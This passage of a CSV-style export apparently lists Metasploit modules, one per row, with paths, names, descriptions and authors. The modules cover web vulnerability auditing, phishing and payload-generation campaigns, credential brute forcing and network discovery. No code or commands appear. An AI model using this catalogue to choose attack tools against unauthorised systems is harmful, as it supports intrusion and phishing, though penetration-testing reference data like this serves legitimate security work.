16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/nexpose.rb","auxiliary","pro/nexpose","auxiliary/pro/nexpose","PRO: Nexpose Scanner Integration",300,"Launch scans in a Nexpose instance, retrieve and import the data","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1358,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/nexpose_asset_group_push.rb","auxiliary","pro/nexpose_asset_group_push","auxiliary/pro/nexpose_asset_group_push","PRO: Nexpose Asset Group Push",300,"Create asset groups within Nexpose","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1359,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/nexpose_exception_push.rb","auxiliary","pro/nexpose_exception_push","auxiliary/pro/nexpose_exception_push","PRO: Nexpose Exception Push",300,"Create vulnerability exceptions within Nexpose","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1360,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/normalize.rb","auxiliary","pro/normalize","auxiliary/pro/normalize","PRO: Host Information Normalizer",300,"Make host and service information consistent","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1361,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/replay.rb","auxiliary","pro/replay","auxiliary/pro/replay","PRO: Replay All Sucessful Attacks",300,"Attempt to exploit all previously identified vulnerabilities","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1362,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/report.rb","auxiliary","pro/report","auxiliary/pro/report","PRO: Multiformat Report Generator",300,"Generate reports on the current workspace","Rapid7 Proprietary","f",,,,"aggressive","t",,"egypt , todb " 1363,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/single.rb","auxiliary","pro/single","auxiliary/pro/single","PRO: Single Module Execution Agent",300,"Launch a specific module against one or more systems","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1364,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/campaign_commander.rb","auxiliary","pro/social_engineering/campaign_commander","auxiliary/pro/social_engineering/campaign_commander","PRO: Social Engineering Campaign Commander Module",300,"Command-and-control module for SocialEngineering Campaign components","Rapid7 Proprietary","f",,,,"aggressive","t",,"Rapid7" 1365,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/email_track.rb","auxiliary","pro/social_engineering/email_track","auxiliary/pro/social_engineering/email_track","Pro: Campaigns - HTTP Email Track Dummy Server",300,"Sins up the http server for email only campaigns","Rapid7 Proprietary","f",,,,"aggressive","t",,"TheLightCosine " 1366,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/portable_file_generate.rb","auxiliary","pro/social_engineering/portable_file_generate","auxiliary/pro/social_engineering/portable_file_generate","PRO: Social Engineering Portable File Creator",300,"Create a payload for the given Portable File","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1367,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/send_email.rb","auxiliary","pro/social_engineering/send_email","auxiliary/pro/social_engineering/send_email","PRO: Social Engineering Emailer",300,"Conduct a social engineering attack via email to every address associated with the given Campaign","Rapid7 Proprietary","f",,,,"aggressive","t",,"Rapid7" 1368,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/usb_key_generate_exe.rb","auxiliary","pro/social_engineering/usb_key_generate_exe","auxiliary/pro/social_engineering/usb_key_generate_exe","PRO: Social Engineering Payload Creator",300,"Create an executable payload for the given usb key","Rapid7 Proprietary","f",,,,"aggressive","t",,"egypt " 1369,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/web_file.rb","auxiliary","pro/social_engineering/web_file","auxiliary/pro/social_engineering/web_file","Pro: Campaigns - HTTP File Server",300,"Serves up a File via HTTP","Rapid7 Proprietary","f",,,,"aggressive","t",,"TheLightCosine " 1370,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/social_engineering/web_phish.rb","auxiliary","pro/social_engineering/web_phish","auxiliary/pro/social_engineering/web_phish","Pro: Campaigns - HTTP Click Tracking",300,"Track incoming clicks from a campaign","Rapid7 Proprietary","f",,,,"aggressive","t",,"Rapid7" 1371,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/tunnel.rb","auxiliary","pro/tunnel","auxiliary/pro/tunnel","PRO: Tunnel",300,"Creates a tunnel through a specific session for an address range","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1372,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/upgrade_sessions.rb","auxiliary","pro/upgrade_sessions","auxiliary/pro/upgrade_sessions","PRO: Win32 CMD shell Upgrade",300,"Upgrade a Win32 CMD Shell to Meterpreter","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm , jduck , thelightcosine" 1373,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/upload.rb","auxiliary","pro/upload","auxiliary/pro/upload","PRO: Upload a File",300,"Upload a specific file to a target","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm " 1374,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/vhost_discover.rb","auxiliary","pro/vhost_discover","auxiliary/pro/vhost_discover","PRO: Virtual host discovery module",300,"Discover distinct virtual host (vhost) records for a specific IP address.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1375,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/web/nada_proxy.rb","auxiliary","pro/web/nada_proxy","auxiliary/pro/web/nada_proxy","PRO: Not a proxy web server",300,"Start a web server that sudo proxys calls","Rapid7 Proprietary","f",,,,"aggressive","t",,"lance" 1376,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/web_ssl_scan.rb","auxiliary","pro/web_ssl_scan","auxiliary/pro/web_ssl_scan","PRO: Web SSL Scan Module",300,"Scans a Web Server for SSL Support. It checks to ensure that SSL is supported. It also checks if weak ciphers are supported by the server. It reports a Web Vuln if weak ciphers are supported or there is no SSL Support.","Rapid7 Proprietary","f",,,,"aggressive","t",,"thelightcosine" 1377,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit.rb","auxiliary","pro/webaudit","auxiliary/pro/webaudit","PRO: Web Application Auditor",300,"Identify web application vulnerabilities","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm , tasos" 1378,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/cmd.rb","auxiliary","pro/webaudit/cmd","auxiliary/pro/webaudit/cmd","PRO: OS command injection module",300,"Identifies OS shell command injection vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1379,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/cmd_blind_timing.rb","auxiliary","pro/webaudit/cmd_blind_timing","auxiliary/pro/webaudit/cmd_blind_timing","PRO: OS command injection module (timing)",300,"Identifies OS shell command injection vulnerabilities using timing attacks.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1380,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/direct_object_reference.rb","auxiliary","pro/webaudit/direct_object_reference","auxiliary/pro/webaudit/direct_object_reference","PRO: Direct Object Reference module",300,"Identifies Direct Object Reference vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1381,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/ldapi.rb","auxiliary","pro/webaudit/ldapi","auxiliary/pro/webaudit/ldapi","PRO: LDAP injection module",300,"Identifies LDAP injection vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1382,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/lfi.rb","auxiliary","pro/webaudit/lfi","auxiliary/pro/webaudit/lfi","PRO: Local file inclusion module",300,"Identifies local file inclusion vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1383,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/php_eval.rb","auxiliary","pro/webaudit/php_eval","auxiliary/pro/webaudit/php_eval","PRO: PHP code injection module",300,"Identifies PHP code injection vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1384,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/php_eval_timing.rb","auxiliary","pro/webaudit/php_eval_timing","auxiliary/pro/webaudit/php_eval_timing","PRO: PHP code injection module (timing)",300,"Identifies PHP code injection vulnerabilities using timing attacks.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1385,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/rfi.rb","auxiliary","pro/webaudit/rfi","auxiliary/pro/webaudit/rfi","PRO: Remote file inclusion module",300,"Identifies remote file inclusion vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1386,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/session_fixation.rb","auxiliary","pro/webaudit/session_fixation","auxiliary/pro/webaudit/session_fixation","PRO: Session fixation module",300,"Identifies session fixation vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1387,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/sqli.rb","auxiliary","pro/webaudit/sqli","auxiliary/pro/webaudit/sqli","PRO: SQL injection module",300,"Identifies SQL injection vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1388,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/sqli_blind_differential.rb","auxiliary","pro/webaudit/sqli_blind_differential","auxiliary/pro/webaudit/sqli_blind_differential","PRO: SQL injection module (differential)",300,"Identifies SQL injection vulnerabilities using pairs of fault/boolean injections and differential analysis.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1389,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/sqli_blind_timing_mssql.rb","auxiliary","pro/webaudit/sqli_blind_timing_mssql","auxiliary/pro/webaudit/sqli_blind_timing_mssql","PRO: MSSQL SQL injection module (timing)",300,"Identifies MSSQL SQL injection vulnerabilities using timing attacks.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1390,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/sqli_blind_timing_mysql.rb","auxiliary","pro/webaudit/sqli_blind_timing_mysql","auxiliary/pro/webaudit/sqli_blind_timing_mysql","PRO: MySQL blind SQL injection module (timing)",300,"Identifies SQL injection vulnerabilities for MySQL using timing attacks.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1391,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/sqli_blind_timing_postgres.rb","auxiliary","pro/webaudit/sqli_blind_timing_postgres","auxiliary/pro/webaudit/sqli_blind_timing_postgres","PRO: Postgres blind SQL injection module (timing)",300,"Identifies SQL injection vulnerabilities using timing attacks.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1392,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/unvalidated_redirect.rb","auxiliary","pro/webaudit/unvalidated_redirect","auxiliary/pro/webaudit/unvalidated_redirect","PRO: Unvalidated redirect module",300,"Identifies unvalidated redirect vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1393,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/xpath_injection.rb","auxiliary","pro/webaudit/xpath_injection","auxiliary/pro/webaudit/xpath_injection","PRO: XPATH injection module",300,"Identifies XPATH injection vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1394,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/xss.rb","auxiliary","pro/webaudit/xss","auxiliary/pro/webaudit/xss","PRO: XSS module",300,"Identifies XSS vulnerabilities.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1395,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/xss_event.rb","auxiliary","pro/webaudit/xss_event","auxiliary/pro/webaudit/xss_event","PRO: XSS in event attribute module",300,"Identifies XSS vulnerabilities in event attributes of elements.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1396,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/xss_script_tag.rb","auxiliary","pro/webaudit/xss_script_tag","auxiliary/pro/webaudit/xss_script_tag","PRO: XSS in script element.",300,"Identifies XSS vulnerabilities in script elements.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1397,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webaudit/xss_tag.rb","auxiliary","pro/webaudit/xss_tag","auxiliary/pro/webaudit/xss_tag","PRO: XSS in element tag.",300,"Identifies XSS vulnerabilities in tags of elements.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1398,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webcollect_file_inclusion.rb","auxiliary","pro/webcollect_file_inclusion","auxiliary/pro/webcollect_file_inclusion","PRO: WebApp collect module (using Local File Inclusion vulnerabilities)",300,"Leverages Local File Inclusion WebApp vulnerabilities to facilitate exfiltration of server-side files.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1399,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan.rb","auxiliary","pro/webscan","auxiliary/pro/webscan","PRO: Web Application Scanner",300,"Locate web applications and identify forms","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm , tasos" 1400,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/awstats_configdir_exec.rb","auxiliary","pro/webscan/awstats_configdir_exec","auxiliary/pro/webscan/awstats_configdir_exec","PRO: Awstats detection module (v6.1-v6.2) [awstats_configdir_exec]",300,"Identifies vulnerable versions of Awstats.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1401,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/awstats_migrate_exec.rb","auxiliary","pro/webscan/awstats_migrate_exec","auxiliary/pro/webscan/awstats_migrate_exec","PRO: Awstats detection module (v6.4-v6.5) [awstats_migrate_exec]",300,"Identifies vulnerable versions of Awstats.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1402,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/basilic_diff_exec.rb","auxiliary","pro/webscan/basilic_diff_exec","auxiliary/pro/webscan/basilic_diff_exec","PRO: Basilic detection module (v1.5.14) [basilic_diff_exec]",300,"Identifies vulnerable versions of Basilic.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1403,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/cacti_graphimage_exec.rb","auxiliary","pro/webscan/cacti_graphimage_exec","auxiliary/pro/webscan/cacti_graphimage_exec","PRO: Cacti detection module ( < v0.8.6-d) [cacti_graphimage_exec]",300,"Identifies vulnerable versions of Cacti.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1404,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/coppermine_piceditor.rb","auxiliary","pro/webscan/coppermine_piceditor","auxiliary/pro/webscan/coppermine_piceditor","PRO: Coppermine Photo Gallery (<= 1.4.14) detection module [coppermine_piceditor]",300,"Identifies vulnerable versions of Coppermine Photo Gallery.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1405,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/credit_card_number.rb","auxiliary","pro/webscan/credit_card_number","auxiliary/pro/webscan/credit_card_number","PRO: Credit Card number detection module",300,"Identifies Credit Card number disclosures.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1406,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/csrf.rb","auxiliary","pro/webscan/csrf","auxiliary/pro/webscan/csrf","PRO: CSRF identification module",300,"Identifies business-logic-relevant forms without anti-CSRF tokens","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1407,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/http_put.rb","auxiliary","pro/webscan/http_put","auxiliary/pro/webscan/http_put","PRO: HTTP PUT module",300,"Identifies publicly writable server directories","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1408,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/joomla_tinybrowser.rb","auxiliary","pro/webscan/joomla_tinybrowser","auxiliary/pro/webscan/joomla_tinybrowser","PRO: Joomla! (v1.5) detection module",300,"Identifies installation of the Joomla! CMS.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1409,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/mybb_backdoor.rb","auxiliary","pro/webscan/mybb_backdoor","auxiliary/pro/webscan/mybb_backdoor","PRO: MyBB detection module",300,"Identifies installation of the MyBB forum.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1410,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/oscommerce_filemanager.rb","auxiliary","pro/webscan/oscommerce_filemanager","auxiliary/pro/webscan/oscommerce_filemanager","PRO: osCommerce (v2.2) detection module",300,"Identifies vulnerable version of osCommerce.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1411,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/php_wordpress_lastpost.rb","auxiliary","pro/webscan/php_wordpress_lastpost","auxiliary/pro/webscan/php_wordpress_lastpost","PRO: Wordpress ( < v1.5.1.3) detection module",300,"Identifies vulnerable versions of Wordpress.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1412,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/php_xmlrpc_eval.rb","auxiliary","pro/webscan/php_xmlrpc_eval","auxiliary/pro/webscan/php_xmlrpc_eval","PRO: PHP XML-RPC detection module",300,"Identifies PHP XML-RPC servers.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1413,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/ssn.rb","auxiliary","pro/webscan/ssn","auxiliary/pro/webscan/ssn","PRO: Social Security Number detection module",300,"Identifies Social Security Number disclosures.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1414,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/tikiwiki_graph_formula_exec.rb","auxiliary","pro/webscan/tikiwiki_graph_formula_exec","auxiliary/pro/webscan/tikiwiki_graph_formula_exec","PRO: TikiWiki (v1.9.8) detection module",300,"Identifies a vulnerable version of TikiWiki.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1415,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/tikiwiki_jhot_exec.rb","auxiliary","pro/webscan/tikiwiki_jhot_exec","auxiliary/pro/webscan/tikiwiki_jhot_exec","PRO: TikiWiki (v1.9.4) detection module",300,"Identifies a vulnerable version of TikiWiki.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1416,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/tikiwiki_unserialize_exec.rb","auxiliary","pro/webscan/tikiwiki_unserialize_exec","auxiliary/pro/webscan/tikiwiki_unserialize_exec","PRO: TikiWiki (v8.3) detection module",300,"Identifies a vulnerable version of TikiWiki.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1417,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/webscan/unauthorized_access.rb","auxiliary","pro/webscan/unauthorized_access","auxiliary/pro/webscan/unauthorized_access","PRO: Unauthorized access module",300,"Identifies restricted resources which are accessible without authorization.","Rapid7 Proprietary","f",,,,"aggressive","t",,"tasos" 1418,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/websploit.rb","auxiliary","pro/websploit","auxiliary/pro/websploit","PRO: Web Exploitation",300,"Obtain data and remote access through vulnerable web applications","Rapid7 Proprietary","f",,,,"aggressive","t",,"hdm , tasos" 1419,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/wizard/quick_pentest.rb","auxiliary","pro/wizard/quick_pentest","auxiliary/pro/wizard/quick_pentest","PRO: Quick Pentest Wizard Runner",300,"Command-and-control module for running all the submodulesof a Quick Pentest wizard under one task.","Rapid7 Proprietary","f",,,,"aggressive","t",,"Rapid7" 1420,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/auxiliary/pro/wizard/web_app_test.rb","auxiliary","pro/wizard/web_app_test","auxiliary/pro/wizard/web_app_test","PRO: Web App Test Runner",300,"Command-and-control module for running all the submodulesof a Web App Test under one task.","Rapid7 Proprietary","f",,,,"aggressive","t",,"Rapid7" 1421,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/afp/afp_login.rb","auxiliary","scanner/afp/afp_login","auxiliary/scanner/afp/afp_login","Apple Filing Protocol Login Utility",300,"This module attempts to bruteforce authentication credentials for AFP.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html, URL-https://developer.apple.com/library/mac/#documentation/networking/conceptual/afp/AFPSecurity/AFPSecurity.html","Gregory Man " 1422,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/afp/afp_server_info.rb","auxiliary","scanner/afp/afp_server_info","auxiliary/scanner/afp/afp_server_info","Apple Filing Protocol Info Enumerator",300,"This module fetches AFP server information, including server name, network address, supported AFP versions, signature, machine type, and server flags.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-https://developer.apple.com/library/mac/#documentation/Networking/Reference/AFP_Reference/Reference/reference.html","Gregory Man " 1423,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb","auxiliary","scanner/backdoor/energizer_duo_detect","auxiliary/scanner/backdoor/energizer_duo_detect","Energizer DUO Trojan Scanner",300,"Detect instances of the Energizer DUO trojan horse software on port 7777","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2010-0103, OSVDB-62782, US-CERT-VU-154421","hdm " 1424,"2013-05-14 23:14:14","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/couchdb/couchdb_enum.rb","auxiliary","scanner/couchdb/couchdb_enum","auxiliary/scanner/couchdb/couchdb_enum","CouchDB Enum Utility",300,"Send a ""send_request_cgi()"" to enumerate databases and your values on CouchDB (Without authentication by default)","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"espreto " 1425,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/db2/db2_auth.rb","auxiliary","scanner/db2/db2_auth","auxiliary/scanner/db2/db2_auth","DB2 Authentication Brute Force Utility",300,"This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","todb " 1426,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/db2/db2_version.rb","auxiliary","scanner/db2/db2_version","auxiliary/scanner/db2/db2_version","DB2 Probe Utility",300,"This module queries a DB2 instance information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"todb " 1427,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/db2/discovery.rb","auxiliary","scanner/db2/discovery","auxiliary/scanner/db2/discovery","DB2 Discovery Service Detection",300,"This module simply queries the DB2 discovery service for information.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"MC " 1428,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb","auxiliary","scanner/dcerpc/endpoint_mapper","auxiliary/scanner/dcerpc/endpoint_mapper","Endpoint Mapper Service Discovery",300,"This module can be used to obtain information from the Endpoint Mapper service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1429,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/dcerpc/hidden.rb","auxiliary","scanner/dcerpc/hidden","auxiliary/scanner/dcerpc/hidden","Hidden DCERPC Service Discovery",300,"This module will query the endpoint mapper and make a list of all ncacn_tcp RPC services. It will then connect to each of these services and use the management API to list all other RPC services accessible on this port. Any RPC service found attached to a TCP port, but not listed in the endpoint mapper, will be displayed and analyzed to see whether anonymous access is permitted.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1430,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/dcerpc/management.rb","auxiliary","scanner/dcerpc/management","auxiliary/scanner/dcerpc/management","Remote Management Interface Discovery",300,"This module can be used to obtain information from the Remote Management Interface DCERPC service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1431,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb","auxiliary","scanner/dcerpc/tcp_dcerpc_auditor","auxiliary/scanner/dcerpc/tcp_dcerpc_auditor","DCERPC TCP Service Auditor",300,"Determine what DCERPC services are accessible over a TCP port","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1432,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/dect/call_scanner.rb","auxiliary","scanner/dect/call_scanner","auxiliary/scanner/dect/call_scanner","DECT Call Scanner",300,"This module scans for active DECT calls","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.dedected.org","DK " 1433,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/dect/station_scanner.rb","auxiliary","scanner/dect/station_scanner","auxiliary/scanner/dect/station_scanner","DECT Base Station Scanner",300,"This module scans for DECT base stations","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.dedected.org","DK " 1434,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/discovery/arp_sweep.rb","auxiliary","scanner/discovery/arp_sweep","auxiliary/scanner/discovery/arp_sweep","ARP Sweep Local Network Discovery",300,"Enumerate alive Hosts in local network using ARP requests.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"belch" 1435,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/discovery/ipv6_multicast_ping.rb","auxiliary","scanner/discovery/ipv6_multicast_ping","auxiliary/scanner/discovery/ipv6_multicast_ping","IPv6 Link Local/Node Local Ping Discovery",300,"Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://wuntee.blogspot.com/2010/12/ipv6-ping-host-discovery-metasploit.html","wuntee" 1436,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb","auxiliary","scanner/discovery/ipv6_neighbor","auxiliary/scanner/discovery/ipv6_neighbor","IPv6 Local Neighbor Discovery",300,"Enumerate local IPv6 hosts which respond to Neighbor Solicitations with a link-local address. Note, that like ARP scanning, this usually cannot be performed beyond the local broadcast network.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"belch" 1437,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb","auxiliary","scanner/discovery/ipv6_neighbor_router_advertisement","auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement","IPv6 Local Neighbor Discovery Using Router Advertisement",300,"Send a spoofed router advertisement with high priority to force hosts to start the IPv6 address auto-config. Monitor for IPv6 host advertisements, and try to guess the link-local address by concatinating the prefix, and the host portion of the IPv6 address. Use NDP host solicitation to determine if the IP address is valid'","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://wuntee.blogspot.com/2010/11/ipv6-link-local-host-discovery-concept.html","wuntee" 1438,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/discovery/udp_probe.rb","auxiliary","scanner/discovery/udp_probe","auxiliary/scanner/discovery/udp_probe","UDP Service Prober",300,"Detect common UDP services using sequential probes","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1439,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/discovery/udp_sweep.rb","auxiliary","scanner/discovery/udp_sweep","auxiliary/scanner/discovery/udp_sweep","UDP Service Sweeper",300,"Detect interesting UDP 